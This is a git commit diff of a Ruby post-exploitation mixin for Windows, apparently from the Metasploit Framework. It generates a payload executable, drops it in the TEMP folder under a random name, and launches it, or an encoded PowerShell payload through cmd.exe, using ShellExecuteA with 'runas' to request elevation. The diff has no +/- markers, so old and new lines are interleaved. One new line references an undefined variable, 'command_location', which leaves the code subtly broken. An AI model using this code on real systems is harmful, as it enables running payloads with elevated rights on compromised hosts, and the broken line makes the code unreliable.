bug/bundler_fix
Meatballs 2014-03-22 18:38:58 +00:00
parent b524507e4e
commit d53b56c161
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 9 additions and 9 deletions

View File

@ -10,31 +10,31 @@ module Msf::Post::Windows::Runas
include Msf::Exploit::Powershell
def execute_exe(filename=nil, path=nil, upload=nil)
exe_payload = generate_payload_exe
payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
payload_path = path || get_env('TEMP')
cmd_location = "#{payload_path}\\#{payload_filename}"
if upload
exe_payload = generate_payload_exe
print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
write_file(cmd_location, exe_payload)
else
print_error("No Upload Path!")
return
print_status("No file uploaded, attempting to execute #{cmd_location}...")
end
command = cmd_location
shell_exec(command, nil)
shell_exec(command_location, nil)
end
def execute_psh
command,args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
shell_exec(command,args)
powershell_command = cmd_psh_payload(payload.encoded)
command = 'cmd.exe'
args = "/c #{powershell_command}"
shell_exec(command, args)
end
def shell_exec(command, args)
print_status("Executing elevated command!")
session.railgun.shell32.ShellExecuteA(nil, "runas", command, args, nil, 5)
print_status("Executing elevated command...")
session.railgun.shell32.ShellExecuteA(nil, 'runas', command, args, nil, 'SW_SHOW')
end
end